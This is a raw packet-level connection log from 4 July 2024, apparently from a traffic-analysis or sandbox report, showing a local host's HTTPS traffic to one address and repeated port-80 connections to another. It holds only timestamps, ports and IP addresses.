Jul 4, 2024 08:22:44.605552912 CEST	49739	443	192.168.2.4	142.250.185.97
Jul 4, 2024 08:22:44.605559111 CEST	443	49739	142.250.185.97	192.168.2.4
Jul 4, 2024 08:22:44.605601072 CEST	49739	443	192.168.2.4	142.250.185.97
Jul 4, 2024 08:22:44.612112999 CEST	443	49739	142.250.185.97	192.168.2.4
Jul 4, 2024 08:22:44.612164021 CEST	49739	443	192.168.2.4	142.250.185.97
Jul 4, 2024 08:22:44.612169981 CEST	443	49739	142.250.185.97	192.168.2.4
Jul 4, 2024 08:22:44.612215042 CEST	49739	443	192.168.2.4	142.250.185.97
Jul 4, 2024 08:22:44.620142937 CEST	443	49739	142.250.185.97	192.168.2.4
Jul 4, 2024 08:22:44.620197058 CEST	49739	443	192.168.2.4	142.250.185.97
Jul 4, 2024 08:22:44.620215893 CEST	443	49739	142.250.185.97	192.168.2.4
Jul 4, 2024 08:22:44.620260954 CEST	49739	443	192.168.2.4	142.250.185.97
Jul 4, 2024 08:22:44.627152920 CEST	443	49739	142.250.185.97	192.168.2.4
Jul 4, 2024 08:22:44.627208948 CEST	49739	443	192.168.2.4	142.250.185.97
Jul 4, 2024 08:22:44.641304016 CEST	443	49739	142.250.185.97	192.168.2.4
Jul 4, 2024 08:22:44.641365051 CEST	49739	443	192.168.2.4	142.250.185.97
Jul 4, 2024 08:22:44.641387939 CEST	443	49739	142.250.185.97	192.168.2.4
Jul 4, 2024 08:22:44.641429901 CEST	49739	443	192.168.2.4	142.250.185.97
Jul 4, 2024 08:22:44.661792994 CEST	443	49739	142.250.185.97	192.168.2.4
Jul 4, 2024 08:22:44.661858082 CEST	49739	443	192.168.2.4	142.250.185.97
Jul 4, 2024 08:22:44.661863089 CEST	443	49739	142.250.185.97	192.168.2.4
Jul 4, 2024 08:22:44.661884069 CEST	443	49739	142.250.185.97	192.168.2.4
Jul 4, 2024 08:22:44.661896944 CEST	49739	443	192.168.2.4	142.250.185.97
Jul 4, 2024 08:22:44.661946058 CEST	49739	443	192.168.2.4	142.250.185.97
Jul 4, 2024 08:22:44.662096024 CEST	443	49739	142.250.185.97	192.168.2.4
Jul 4, 2024 08:22:44.662143946 CEST	49739	443	192.168.2.4	142.250.185.97
Jul 4, 2024 08:22:44.662189960 CEST	443	49739	142.250.185.97	192.168.2.4
Jul 4, 2024 08:22:44.662235022 CEST	49739	443	192.168.2.4	142.250.185.97
Jul 4, 2024 08:22:44.662240028 CEST	443	49739	142.250.185.97	192.168.2.4
Jul 4, 2024 08:22:44.662286043 CEST	49739	443	192.168.2.4	142.250.185.97
Jul 4, 2024 08:22:44.662288904 CEST	443	49739	142.250.185.97	192.168.2.4
Jul 4, 2024 08:22:44.662332058 CEST	49739	443	192.168.2.4	142.250.185.97
Jul 4, 2024 08:22:44.662336111 CEST	443	49739	142.250.185.97	192.168.2.4
Jul 4, 2024 08:22:44.662375927 CEST	49739	443	192.168.2.4	142.250.185.97
Jul 4, 2024 08:22:44.663033962 CEST	443	49739	142.250.185.97	192.168.2.4
Jul 4, 2024 08:22:44.663079977 CEST	49739	443	192.168.2.4	142.250.185.97
Jul 4, 2024 08:22:44.663083076 CEST	443	49739	142.250.185.97	192.168.2.4
Jul 4, 2024 08:22:44.663129091 CEST	49739	443	192.168.2.4	142.250.185.97
Jul 4, 2024 08:22:44.663132906 CEST	443	49739	142.250.185.97	192.168.2.4
Jul 4, 2024 08:22:44.663178921 CEST	49739	443	192.168.2.4	142.250.185.97
Jul 4, 2024 08:22:44.663463116 CEST	443	49739	142.250.185.97	192.168.2.4
Jul 4, 2024 08:22:44.663510084 CEST	49739	443	192.168.2.4	142.250.185.97
Jul 4, 2024 08:22:44.666980982 CEST	443	49739	142.250.185.97	192.168.2.4
Jul 4, 2024 08:22:44.667027950 CEST	49739	443	192.168.2.4	142.250.185.97
Jul 4, 2024 08:22:44.667033911 CEST	443	49739	142.250.185.97	192.168.2.4
Jul 4, 2024 08:22:44.667078018 CEST	49739	443	192.168.2.4	142.250.185.97
Jul 4, 2024 08:22:44.671823978 CEST	443	49739	142.250.185.97	192.168.2.4
Jul 4, 2024 08:22:44.671881914 CEST	49739	443	192.168.2.4	142.250.185.97
Jul 4, 2024 08:22:44.671924114 CEST	443	49739	142.250.185.97	192.168.2.4
Jul 4, 2024 08:22:44.671964884 CEST	49739	443	192.168.2.4	142.250.185.97
Jul 4, 2024 08:22:44.676613092 CEST	443	49739	142.250.185.97	192.168.2.4
Jul 4, 2024 08:22:44.676668882 CEST	49739	443	192.168.2.4	142.250.185.97
Jul 4, 2024 08:22:44.676673889 CEST	443	49739	142.250.185.97	192.168.2.4
Jul 4, 2024 08:22:44.676712036 CEST	49739	443	192.168.2.4	142.250.185.97
Jul 4, 2024 08:22:44.681221008 CEST	443	49739	142.250.185.97	192.168.2.4
Jul 4, 2024 08:22:44.681282043 CEST	49739	443	192.168.2.4	142.250.185.97
Jul 4, 2024 08:22:44.681287050 CEST	443	49739	142.250.185.97	192.168.2.4
Jul 4, 2024 08:22:44.681332111 CEST	49739	443	192.168.2.4	142.250.185.97
Jul 4, 2024 08:22:44.685669899 CEST	443	49739	142.250.185.97	192.168.2.4
Jul 4, 2024 08:22:44.685724974 CEST	49739	443	192.168.2.4	142.250.185.97
Jul 4, 2024 08:22:44.685729027 CEST	443	49739	142.250.185.97	192.168.2.4
Jul 4, 2024 08:22:44.685765982 CEST	49739	443	192.168.2.4	142.250.185.97
Jul 4, 2024 08:22:44.689949989 CEST	443	49739	142.250.185.97	192.168.2.4
Jul 4, 2024 08:22:44.690000057 CEST	49739	443	192.168.2.4	142.250.185.97
Jul 4, 2024 08:22:44.690002918 CEST	443	49739	142.250.185.97	192.168.2.4
Jul 4, 2024 08:22:44.690043926 CEST	49739	443	192.168.2.4	142.250.185.97
Jul 4, 2024 08:22:44.694432974 CEST	443	49739	142.250.185.97	192.168.2.4
Jul 4, 2024 08:22:44.694503069 CEST	49739	443	192.168.2.4	142.250.185.97
Jul 4, 2024 08:22:44.694506884 CEST	443	49739	142.250.185.97	192.168.2.4
Jul 4, 2024 08:22:44.694550037 CEST	49739	443	192.168.2.4	142.250.185.97
Jul 4, 2024 08:22:44.698975086 CEST	443	49739	142.250.185.97	192.168.2.4
Jul 4, 2024 08:22:44.699044943 CEST	49739	443	192.168.2.4	142.250.185.97
Jul 4, 2024 08:22:44.699050903 CEST	443	49739	142.250.185.97	192.168.2.4
Jul 4, 2024 08:22:44.699093103 CEST	49739	443	192.168.2.4	142.250.185.97
Jul 4, 2024 08:22:44.703336000 CEST	443	49739	142.250.185.97	192.168.2.4
Jul 4, 2024 08:22:44.703407049 CEST	49739	443	192.168.2.4	142.250.185.97
Jul 4, 2024 08:22:44.703411102 CEST	443	49739	142.250.185.97	192.168.2.4
Jul 4, 2024 08:22:44.703452110 CEST	49739	443	192.168.2.4	142.250.185.97
Jul 4, 2024 08:22:44.707717896 CEST	443	49739	142.250.185.97	192.168.2.4
Jul 4, 2024 08:22:44.707789898 CEST	49739	443	192.168.2.4	142.250.185.97
Jul 4, 2024 08:22:44.707793951 CEST	443	49739	142.250.185.97	192.168.2.4
Jul 4, 2024 08:22:44.707835913 CEST	49739	443	192.168.2.4	142.250.185.97
Jul 4, 2024 08:22:44.711488962 CEST	443	49739	142.250.185.97	192.168.2.4
Jul 4, 2024 08:22:44.711568117 CEST	443	49739	142.250.185.97	192.168.2.4
Jul 4, 2024 08:22:44.711577892 CEST	49739	443	192.168.2.4	142.250.185.97
Jul 4, 2024 08:22:44.711584091 CEST	443	49739	142.250.185.97	192.168.2.4
Jul 4, 2024 08:22:44.711646080 CEST	49739	443	192.168.2.4	142.250.185.97
Jul 4, 2024 08:22:44.715512037 CEST	443	49739	142.250.185.97	192.168.2.4
Jul 4, 2024 08:22:44.715579033 CEST	49739	443	192.168.2.4	142.250.185.97
Jul 4, 2024 08:22:44.715583086 CEST	443	49739	142.250.185.97	192.168.2.4
Jul 4, 2024 08:22:44.715627909 CEST	49739	443	192.168.2.4	142.250.185.97
Jul 4, 2024 08:22:44.719369888 CEST	443	49739	142.250.185.97	192.168.2.4
Jul 4, 2024 08:22:44.719420910 CEST	49739	443	192.168.2.4	142.250.185.97
Jul 4, 2024 08:22:44.719424963 CEST	443	49739	142.250.185.97	192.168.2.4
Jul 4, 2024 08:22:44.719465017 CEST	49739	443	192.168.2.4	142.250.185.97
Jul 4, 2024 08:22:44.723200083 CEST	443	49739	142.250.185.97	192.168.2.4
Jul 4, 2024 08:22:44.723288059 CEST	49739	443	192.168.2.4	142.250.185.97
Jul 4, 2024 08:22:44.723292112 CEST	443	49739	142.250.185.97	192.168.2.4
Jul 4, 2024 08:22:44.723335981 CEST	49739	443	192.168.2.4	142.250.185.97
Jul 4, 2024 08:22:44.727006912 CEST	443	49739	142.250.185.97	192.168.2.4
Jul 4, 2024 08:22:44.727063894 CEST	49739	443	192.168.2.4	142.250.185.97
Jul 4, 2024 08:22:44.727070093 CEST	443	49739	142.250.185.97	192.168.2.4
Jul 4, 2024 08:22:44.727113008 CEST	49739	443	192.168.2.4	142.250.185.97
Jul 4, 2024 08:22:44.730633974 CEST	443	49739	142.250.185.97	192.168.2.4
Jul 4, 2024 08:22:44.730684996 CEST	49739	443	192.168.2.4	142.250.185.97
Jul 4, 2024 08:22:44.730741978 CEST	49739	443	192.168.2.4	142.250.185.97
Jul 4, 2024 08:22:44.730779886 CEST	443	49739	142.250.185.97	192.168.2.4
Jul 4, 2024 08:22:44.730833054 CEST	49739	443	192.168.2.4	142.250.185.97
Jul 4, 2024 08:22:46.601933956 CEST	49740	80	192.168.2.4	45.61.136.239
Jul 4, 2024 08:22:46.607201099 CEST	80	49740	45.61.136.239	192.168.2.4
Jul 4, 2024 08:22:46.609524012 CEST	49740	80	192.168.2.4	45.61.136.239
Jul 4, 2024 08:22:46.615235090 CEST	49740	80	192.168.2.4	45.61.136.239
Jul 4, 2024 08:22:46.622399092 CEST	80	49740	45.61.136.239	192.168.2.4
Jul 4, 2024 08:22:46.622466087 CEST	49740	80	192.168.2.4	45.61.136.239
Jul 4, 2024 08:22:46.627512932 CEST	80	49740	45.61.136.239	192.168.2.4
Jul 4, 2024 08:22:50.948400021 CEST	80	49740	45.61.136.239	192.168.2.4
Jul 4, 2024 08:22:50.948419094 CEST	80	49740	45.61.136.239	192.168.2.4
Jul 4, 2024 08:22:50.948440075 CEST	80	49740	45.61.136.239	192.168.2.4
Jul 4, 2024 08:22:50.948468924 CEST	80	49740	45.61.136.239	192.168.2.4
Jul 4, 2024 08:22:50.948477983 CEST	80	49740	45.61.136.239	192.168.2.4
Jul 4, 2024 08:22:50.948499918 CEST	80	49740	45.61.136.239	192.168.2.4
Jul 4, 2024 08:22:50.948559999 CEST	49740	80	192.168.2.4	45.61.136.239
Jul 4, 2024 08:22:50.948606014 CEST	49740	80	192.168.2.4	45.61.136.239
Jul 4, 2024 08:22:50.948723078 CEST	80	49740	45.61.136.239	192.168.2.4
Jul 4, 2024 08:22:50.948734045 CEST	80	49740	45.61.136.239	192.168.2.4
Jul 4, 2024 08:22:50.948751926 CEST	80	49740	45.61.136.239	192.168.2.4
Jul 4, 2024 08:22:50.948781967 CEST	49740	80	192.168.2.4	45.61.136.239
Jul 4, 2024 08:22:50.950061083 CEST	80	49740	45.61.136.239	192.168.2.4
Jul 4, 2024 08:22:50.950109005 CEST	49740	80	192.168.2.4	45.61.136.239
Jul 4, 2024 08:22:50.953516006 CEST	80	49740	45.61.136.239	192.168.2.4
Jul 4, 2024 08:22:50.953572989 CEST	80	49740	45.61.136.239	192.168.2.4
Jul 4, 2024 08:22:50.953583002 CEST	80	49740	45.61.136.239	192.168.2.4
Jul 4, 2024 08:22:50.953619957 CEST	49740	80	192.168.2.4	45.61.136.239
Jul 4, 2024 08:22:50.953650951 CEST	49740	80	192.168.2.4	45.61.136.239
Jul 4, 2024 08:22:50.953860044 CEST	80	49740	45.61.136.239	192.168.2.4
Jul 4, 2024 08:22:50.953919888 CEST	49740	80	192.168.2.4	45.61.136.239
Jul 4, 2024 08:22:51.469084024 CEST	49741	80	192.168.2.4	45.61.136.239
Jul 4, 2024 08:22:51.473967075 CEST	80	49741	45.61.136.239	192.168.2.4
Jul 4, 2024 08:22:51.474052906 CEST	49741	80	192.168.2.4	45.61.136.239
Jul 4, 2024 08:22:51.476463079 CEST	49741	80	192.168.2.4	45.61.136.239
Jul 4, 2024 08:22:51.481854916 CEST	80	49741	45.61.136.239	192.168.2.4
Jul 4, 2024 08:22:51.481913090 CEST	49741	80	192.168.2.4	45.61.136.239
Jul 4, 2024 08:22:51.486881018 CEST	80	49741	45.61.136.239	192.168.2.4
Jul 4, 2024 08:22:54.832844973 CEST	80	49741	45.61.136.239	192.168.2.4
Jul 4, 2024 08:22:54.832878113 CEST	80	49741	45.61.136.239	192.168.2.4
Jul 4, 2024 08:22:54.832891941 CEST	80	49741	45.61.136.239	192.168.2.4
Jul 4, 2024 08:22:54.832959890 CEST	49741	80	192.168.2.4	45.61.136.239
Jul 4, 2024 08:22:54.832984924 CEST	80	49741	45.61.136.239	192.168.2.4
Jul 4, 2024 08:22:54.832997084 CEST	80	49741	45.61.136.239	192.168.2.4
Jul 4, 2024 08:22:54.833014965 CEST	80	49741	45.61.136.239	192.168.2.4
Jul 4, 2024 08:22:54.833028078 CEST	80	49741	45.61.136.239	192.168.2.4
Jul 4, 2024 08:22:54.833038092 CEST	49741	80	192.168.2.4	45.61.136.239
Jul 4, 2024 08:22:54.833045006 CEST	80	49741	45.61.136.239	192.168.2.4
Jul 4, 2024 08:22:54.833062887 CEST	49741	80	192.168.2.4	45.61.136.239
Jul 4, 2024 08:22:54.833095074 CEST	49741	80	192.168.2.4	45.61.136.239
Jul 4, 2024 08:22:54.833276033 CEST	80	49741	45.61.136.239	192.168.2.4
Jul 4, 2024 08:22:54.833287001 CEST	80	49741	45.61.136.239	192.168.2.4
Jul 4, 2024 08:22:54.833307028 CEST	80	49741	45.61.136.239	192.168.2.4
Jul 4, 2024 08:22:54.833338976 CEST	49741	80	192.168.2.4	45.61.136.239
Jul 4, 2024 08:22:54.834731102 CEST	49741	80	192.168.2.4	45.61.136.239
Jul 4, 2024 08:22:54.837785959 CEST	80	49741	45.61.136.239	192.168.2.4
Jul 4, 2024 08:22:54.837846994 CEST	49741	80	192.168.2.4	45.61.136.239
Jul 4, 2024 08:22:54.837877989 CEST	80	49741	45.61.136.239	192.168.2.4
Jul 4, 2024 08:22:54.837889910 CEST	80	49741	45.61.136.239	192.168.2.4
Jul 4, 2024 08:22:54.837918997 CEST	49741	80	192.168.2.4	45.61.136.239
Jul 4, 2024 08:22:54.837935925 CEST	49741	80	192.168.2.4	45.61.136.239
Jul 4, 2024 08:22:54.838090897 CEST	80	49741	45.61.136.239	192.168.2.4
Jul 4, 2024 08:22:54.838130951 CEST	49741	80	192.168.2.4	45.61.136.239
Jul 4, 2024 08:22:54.838152885 CEST	80	49741	45.61.136.239	192.168.2.4
Jul 4, 2024 08:22:54.838165045 CEST	80	49741	45.61.136.239	192.168.2.4
Jul 4, 2024 08:22:54.838196993 CEST	49741	80	192.168.2.4	45.61.136.239
Jul 4, 2024 08:22:54.838316917 CEST	80	49741	45.61.136.239	192.168.2.4
Jul 4, 2024 08:22:54.838327885 CEST	80	49741	45.61.136.239	192.168.2.4
Jul 4, 2024 08:22:54.838356972 CEST	49741	80	192.168.2.4	45.61.136.239
Jul 4, 2024 08:22:54.838387012 CEST	49741	80	192.168.2.4	45.61.136.239
Jul 4, 2024 08:22:54.839040041 CEST	80	49741	45.61.136.239	192.168.2.4
Jul 4, 2024 08:22:54.839081049 CEST	49741	80	192.168.2.4	45.61.136.239
Jul 4, 2024 08:22:54.839097977 CEST	80	49741	45.61.136.239	192.168.2.4
Jul 4, 2024 08:22:54.839109898 CEST	80	49741	45.61.136.239	192.168.2.4
Jul 4, 2024 08:22:54.839139938 CEST	49741	80	192.168.2.4	45.61.136.239
Jul 4, 2024 08:22:54.839153051 CEST	49741	80	192.168.2.4	45.61.136.239
Jul 4, 2024 08:22:54.839229107 CEST	80	49741	45.61.136.239	192.168.2.4
Jul 4, 2024 08:22:54.839240074 CEST	80	49741	45.61.136.239	192.168.2.4
Jul 4, 2024 08:22:54.839272976 CEST	49741	80	192.168.2.4	45.61.136.239
Jul 4, 2024 08:22:54.938652039 CEST	49742	80	192.168.2.4	45.61.136.239
Jul 4, 2024 08:22:54.943602085 CEST	80	49742	45.61.136.239	192.168.2.4
Jul 4, 2024 08:22:54.943694115 CEST	49742	80	192.168.2.4	45.61.136.239
Jul 4, 2024 08:22:54.945888996 CEST	49742	80	192.168.2.4	45.61.136.239
Jul 4, 2024 08:22:54.950865030 CEST	80	49742	45.61.136.239	192.168.2.4
Jul 4, 2024 08:22:54.950915098 CEST	49742	80	192.168.2.4	45.61.136.239
Jul 4, 2024 08:22:54.957022905 CEST	80	49742	45.61.136.239	192.168.2.4
Jul 4, 2024 08:22:57.945275068 CEST	80	49742	45.61.136.239	192.168.2.4
Jul 4, 2024 08:22:57.945314884 CEST	80	49742	45.61.136.239	192.168.2.4
Jul 4, 2024 08:22:57.945329905 CEST	80	49742	45.61.136.239	192.168.2.4
Jul 4, 2024 08:22:57.945358038 CEST	49742	80	192.168.2.4	45.61.136.239
Jul 4, 2024 08:22:57.945406914 CEST	80	49742	45.61.136.239	192.168.2.4
Jul 4, 2024 08:22:57.945420980 CEST	80	49742	45.61.136.239	192.168.2.4
Jul 4, 2024 08:22:57.945446968 CEST	49742	80	192.168.2.4	45.61.136.239
Jul 4, 2024 08:22:57.945564985 CEST	80	49742	45.61.136.239	192.168.2.4
Jul 4, 2024 08:22:57.945578098 CEST	80	49742	45.61.136.239	192.168.2.4
Jul 4, 2024 08:22:57.945596933 CEST	49742	80	192.168.2.4	45.61.136.239
Jul 4, 2024 08:22:57.945679903 CEST	80	49742	45.61.136.239	192.168.2.4
Jul 4, 2024 08:22:57.945713997 CEST	49742	80	192.168.2.4	45.61.136.239
Jul 4, 2024 08:22:57.945738077 CEST	80	49742	45.61.136.239	192.168.2.4
Jul 4, 2024 08:22:57.945775032 CEST	80	49742	45.61.136.239	192.168.2.4
Jul 4, 2024 08:22:57.945802927 CEST	49742	80	192.168.2.4	45.61.136.239
Jul 4, 2024 08:22:57.947108030 CEST	49742	80	192.168.2.4	45.61.136.239
Jul 4, 2024 08:22:57.950253963 CEST	80	49742	45.61.136.239	192.168.2.4
Jul 4, 2024 08:22:57.950300932 CEST	80	49742	45.61.136.239	192.168.2.4
Jul 4, 2024 08:22:57.950309992 CEST	80	49742	45.61.136.239	192.168.2.4
Jul 4, 2024 08:22:57.950326920 CEST	49742	80	192.168.2.4	45.61.136.239
Jul 4, 2024 08:22:57.950346947 CEST	49742	80	192.168.2.4	45.61.136.239
Jul 4, 2024 08:22:57.950390100 CEST	80	49742	45.61.136.239	192.168.2.4
Jul 4, 2024 08:22:57.950423002 CEST	49742	80	192.168.2.4	45.61.136.239
Jul 4, 2024 08:22:58.308296919 CEST	49744	80	192.168.2.4	45.61.136.239
Jul 4, 2024 08:22:58.314090967 CEST	80	49744	45.61.136.239	192.168.2.4
Jul 4, 2024 08:22:58.314191103 CEST	49744	80	192.168.2.4	45.61.136.239
Jul 4, 2024 08:22:58.321813107 CEST	49744	80	192.168.2.4	45.61.136.239
Jul 4, 2024 08:22:58.328851938 CEST	80	49744	45.61.136.239	192.168.2.4
Jul 4, 2024 08:22:58.328936100 CEST	49744	80	192.168.2.4	45.61.136.239
Jul 4, 2024 08:22:58.334935904 CEST	80	49744	45.61.136.239	192.168.2.4
Jul 4, 2024 08:23:03.020411015 CEST	80	49744	45.61.136.239	192.168.2.4
Jul 4, 2024 08:23:03.020422935 CEST	80	49744	45.61.136.239	192.168.2.4
Jul 4, 2024 08:23:03.020504951 CEST	49744	80	192.168.2.4	45.61.136.239
Jul 4, 2024 08:23:03.020565987 CEST	80	49744	45.61.136.239	192.168.2.4
Jul 4, 2024 08:23:03.020577908 CEST	80	49744	45.61.136.239	192.168.2.4
Jul 4, 2024 08:23:03.020600080 CEST	80	49744	45.61.136.239	192.168.2.4
Jul 4, 2024 08:23:03.020613909 CEST	80	49744	45.61.136.239	192.168.2.4
Jul 4, 2024 08:23:03.020620108 CEST	49744	80	192.168.2.4	45.61.136.239
Jul 4, 2024 08:23:03.020654917 CEST	49744	80	192.168.2.4	45.61.136.239
Jul 4, 2024 08:23:03.020889044 CEST	80	49744	45.61.136.239	192.168.2.4
Jul 4, 2024 08:23:03.020899057 CEST	80	49744	45.61.136.239	192.168.2.4
Jul 4, 2024 08:23:03.020919085 CEST	80	49744	45.61.136.239	192.168.2.4
Jul 4, 2024 08:23:03.020945072 CEST	49744	80	192.168.2.4	45.61.136.239
Jul 4, 2024 08:23:03.021054983 CEST	80	49744	45.61.136.239	192.168.2.4
Jul 4, 2024 08:23:03.021099091 CEST	49744	80	192.168.2.4	45.61.136.239
Jul 4, 2024 08:23:03.021243095 CEST	49744	80	192.168.2.4	45.61.136.239
Jul 4, 2024 08:23:03.032452106 CEST	80	49744	45.61.136.239	192.168.2.4
Jul 4, 2024 08:23:03.032480001 CEST	80	49744	45.61.136.239	192.168.2.4
Jul 4, 2024 08:23:03.032505989 CEST	80	49744	45.61.136.239	192.168.2.4
Jul 4, 2024 08:23:03.032538891 CEST	49744	80	192.168.2.4	45.61.136.239
Jul 4, 2024 08:23:03.032588005 CEST	49744	80	192.168.2.4	45.61.136.239
Jul 4, 2024 08:23:03.032613993 CEST	80	49744	45.61.136.239	192.168.2.4
Jul 4, 2024 08:23:03.032658100 CEST	80	49744	45.61.136.239	192.168.2.4
Jul 4, 2024 08:23:03.032772064 CEST	49744	80	192.168.2.4	45.61.136.239
Jul 4, 2024 08:23:03.032849073 CEST	49744	80	192.168.2.4	45.61.136.239
Jul 4, 2024 08:23:03.161978960 CEST	49745	80	192.168.2.4	45.61.136.239
Jul 4, 2024 08:23:03.167887926 CEST	80	49745	45.61.136.239	192.168.2.4
Jul 4, 2024 08:23:03.168000937 CEST	49745	80	192.168.2.4	45.61.136.239
Jul 4, 2024 08:23:03.170212984 CEST	49745	80	192.168.2.4	45.61.136.239
Jul 4, 2024 08:23:03.176577091 CEST	80	49745	45.61.136.239	192.168.2.4
Jul 4, 2024 08:23:03.176641941 CEST	49745	80	192.168.2.4	45.61.136.239
Jul 4, 2024 08:23:03.181716919 CEST	80	49745	45.61.136.239	192.168.2.4
Jul 4, 2024 08:23:06.268377066 CEST	80	49745	45.61.136.239	192.168.2.4
Jul 4, 2024 08:23:06.268393993 CEST	80	49745	45.61.136.239	192.168.2.4
Jul 4, 2024 08:23:06.268414021 CEST	80	49745	45.61.136.239	192.168.2.4
Jul 4, 2024 08:23:06.268527031 CEST	80	49745	45.61.136.239	192.168.2.4
Jul 4, 2024 08:23:06.268541098 CEST	80	49745	45.61.136.239	192.168.2.4
Jul 4, 2024 08:23:06.268552065 CEST	80	49745	45.61.136.239	192.168.2.4
Jul 4, 2024 08:23:06.268558025 CEST	80	49745	45.61.136.239	192.168.2.4
Jul 4, 2024 08:23:06.268563986 CEST	80	49745	45.61.136.239	192.168.2.4
Jul 4, 2024 08:23:06.268613100 CEST	49745	80	192.168.2.4	45.61.136.239
Jul 4, 2024 08:23:06.268774986 CEST	49745	80	192.168.2.4	45.61.136.239
Jul 4, 2024 08:23:06.269053936 CEST	49745	80	192.168.2.4	45.61.136.239
Jul 4, 2024 08:23:06.271233082 CEST	80	49745	45.61.136.239	192.168.2.4
Jul 4, 2024 08:23:06.271255970 CEST	80	49745	45.61.136.239	192.168.2.4
Jul 4, 2024 08:23:06.271310091 CEST	49745	80	192.168.2.4	45.61.136.239
Jul 4, 2024 08:23:06.271372080 CEST	49745	80	192.168.2.4	45.61.136.239
Jul 4, 2024 08:23:06.273793936 CEST	80	49745	45.61.136.239	192.168.2.4
Jul 4, 2024 08:23:06.273858070 CEST	80	49745	45.61.136.239	192.168.2.4
Jul 4, 2024 08:23:06.273860931 CEST	49745	80	192.168.2.4	45.61.136.239
Jul 4, 2024 08:23:06.273874998 CEST	80	49745	45.61.136.239	192.168.2.4
Jul 4, 2024 08:23:06.273915052 CEST	49745	80	192.168.2.4	45.61.136.239
Jul 4, 2024 08:23:06.273932934 CEST	49745	80	192.168.2.4	45.61.136.239
Jul 4, 2024 08:23:06.414592028 CEST	49746	80	192.168.2.4	45.61.136.239
Jul 4, 2024 08:23:06.421695948 CEST	80	49746	45.61.136.239	192.168.2.4
Jul 4, 2024 08:23:06.421786070 CEST	49746	80	192.168.2.4	45.61.136.239
Jul 4, 2024 08:23:06.423937082 CEST	49746	80	192.168.2.4	45.61.136.239
Jul 4, 2024 08:23:06.430318117 CEST	80	49746	45.61.136.239	192.168.2.4
Jul 4, 2024 08:23:06.430396080 CEST	49746	80	192.168.2.4	45.61.136.239
Jul 4, 2024 08:23:06.436680079 CEST	80	49746	45.61.136.239	192.168.2.4
Jul 4, 2024 08:23:09.439086914 CEST	80	49746	45.61.136.239	192.168.2.4
Jul 4, 2024 08:23:09.439102888 CEST	80	49746	45.61.136.239	192.168.2.4
Jul 4, 2024 08:23:09.439186096 CEST	49746	80	192.168.2.4	45.61.136.239
Jul 4, 2024 08:23:09.439201117 CEST	80	49746	45.61.136.239	192.168.2.4
Jul 4, 2024 08:23:09.439213991 CEST	80	49746	45.61.136.239	192.168.2.4
Jul 4, 2024 08:23:09.439233065 CEST	80	49746	45.61.136.239	192.168.2.4
Jul 4, 2024 08:23:09.439268112 CEST	49746	80	192.168.2.4	45.61.136.239
Jul 4, 2024 08:23:09.439390898 CEST	80	49746	45.61.136.239	192.168.2.4
Jul 4, 2024 08:23:09.439461946 CEST	49746	80	192.168.2.4	45.61.136.239
Jul 4, 2024 08:23:09.439537048 CEST	80	49746	45.61.136.239	192.168.2.4
Jul 4, 2024 08:23:09.439548016 CEST	80	49746	45.61.136.239	192.168.2.4
Jul 4, 2024 08:23:09.439564943 CEST	80	49746	45.61.136.239	192.168.2.4
Jul 4, 2024 08:23:09.439574003 CEST	80	49746	45.61.136.239	192.168.2.4
Jul 4, 2024 08:23:09.439583063 CEST	49746	80	192.168.2.4	45.61.136.239
Jul 4, 2024 08:23:09.439583063 CEST	49746	80	192.168.2.4	45.61.136.239
Jul 4, 2024 08:23:09.439583063 CEST	49746	80	192.168.2.4	45.61.136.239
Jul 4, 2024 08:23:09.439604998 CEST	49746	80	192.168.2.4	45.61.136.239
Jul 4, 2024 08:23:09.440089941 CEST	49746	80	192.168.2.4	45.61.136.239
Jul 4, 2024 08:23:09.444454908 CEST	80	49746	45.61.136.239	192.168.2.4
Jul 4, 2024 08:23:09.444504976 CEST	49746	80	192.168.2.4	45.61.136.239
Jul 4, 2024 08:23:09.444586039 CEST	80	49746	45.61.136.239	192.168.2.4
Jul 4, 2024 08:23:09.444597960 CEST	80	49746	45.61.136.239	192.168.2.4
Jul 4, 2024 08:23:09.444623947 CEST	49746	80	192.168.2.4	45.61.136.239
Jul 4, 2024 08:23:09.444648027 CEST	49746	80	192.168.2.4	45.61.136.239
Jul 4, 2024 08:23:09.444868088 CEST	80	49746	45.61.136.239	192.168.2.4
Jul 4, 2024 08:23:09.444920063 CEST	49746	80	192.168.2.4	45.61.136.239
Jul 4, 2024 08:23:09.444977999 CEST	80	49746	45.61.136.239	192.168.2.4
Jul 4, 2024 08:23:09.445044041 CEST	49746	80	192.168.2.4	45.61.136.239
Jul 4, 2024 08:23:09.585844994 CEST	49747	80	192.168.2.4	45.61.136.239
Jul 4, 2024 08:23:09.590914011 CEST	80	49747	45.61.136.239	192.168.2.4
Jul 4, 2024 08:23:09.591017008 CEST	49747	80	192.168.2.4	45.61.136.239
Jul 4, 2024 08:23:09.594873905 CEST	49747	80	192.168.2.4	45.61.136.239
Jul 4, 2024 08:23:09.599992037 CEST	80	49747	45.61.136.239	192.168.2.4
Jul 4, 2024 08:23:09.600044012 CEST	49747	80	192.168.2.4	45.61.136.239
Jul 4, 2024 08:23:09.604866028 CEST	80	49747	45.61.136.239	192.168.2.4
Jul 4, 2024 08:23:13.522263050 CEST	80	49747	45.61.136.239	192.168.2.4
Jul 4, 2024 08:23:13.522294044 CEST	80	49747	45.61.136.239	192.168.2.4
Jul 4, 2024 08:23:13.522303104 CEST	80	49747	45.61.136.239	192.168.2.4
Jul 4, 2024 08:23:13.522324085 CEST	80	49747	45.61.136.239	192.168.2.4
Jul 4, 2024 08:23:13.522335052 CEST	80	49747	45.61.136.239	192.168.2.4
Jul 4, 2024 08:23:13.522341967 CEST	80	49747	45.61.136.239	192.168.2.4
Jul 4, 2024 08:23:13.522500992 CEST	80	49747	45.61.136.239	192.168.2.4
Jul 4, 2024 08:23:13.522514105 CEST	80	49747	45.61.136.239	192.168.2.4
Jul 4, 2024 08:23:13.522520065 CEST	80	49747	45.61.136.239	192.168.2.4
Jul 4, 2024 08:23:13.522610903 CEST	49747	80	192.168.2.4	45.61.136.239
Jul 4, 2024 08:23:13.522661924 CEST	49747	80	192.168.2.4	45.61.136.239
Jul 4, 2024 08:23:13.522669077 CEST	80	49747	45.61.136.239	192.168.2.4
Jul 4, 2024 08:23:13.527013063 CEST	49747	80	192.168.2.4	45.61.136.239
Jul 4, 2024 08:23:13.527370930 CEST	49747	80	192.168.2.4	45.61.136.239
Jul 4, 2024 08:23:13.532877922 CEST	80	49747	45.61.136.239	192.168.2.4
Jul 4, 2024 08:23:13.532964945 CEST	80	49747	45.61.136.239	192.168.2.4
Jul 4, 2024 08:23:13.532965899 CEST	49747	80	192.168.2.4	45.61.136.239
Jul 4, 2024 08:23:13.532977104 CEST	80	49747	45.61.136.239	192.168.2.4
